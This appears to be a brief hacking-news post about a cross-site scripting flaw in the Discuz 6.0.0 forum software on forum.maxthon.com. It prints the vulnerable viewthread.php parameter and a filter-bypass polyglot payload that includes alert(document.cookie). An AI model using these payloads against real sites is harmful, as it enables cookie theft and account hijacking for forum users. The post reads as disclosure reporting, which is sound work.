Hacker named as "Sony" discovered the XSS vulnerability in Forum.maxthon.com website. Actually, the vulnerability is in the Discuz 6.0.0 forum software. It is one of the old vulnerability in Discuz6.0.0(discovered in 2010), the Viewthread file of the forum software is vulnerable to Cross site Scripting.
Ex:
viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee>
But The above code won't work. Now, Hacker "Sony" use some techniques to bypass the XSS Filtering and got success.
viewthread.php?action=printable&tid=[xss is here]
He insert the following code in the vulnerable link:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><script>alert(document.cookie)</script>
[source: st2tea]
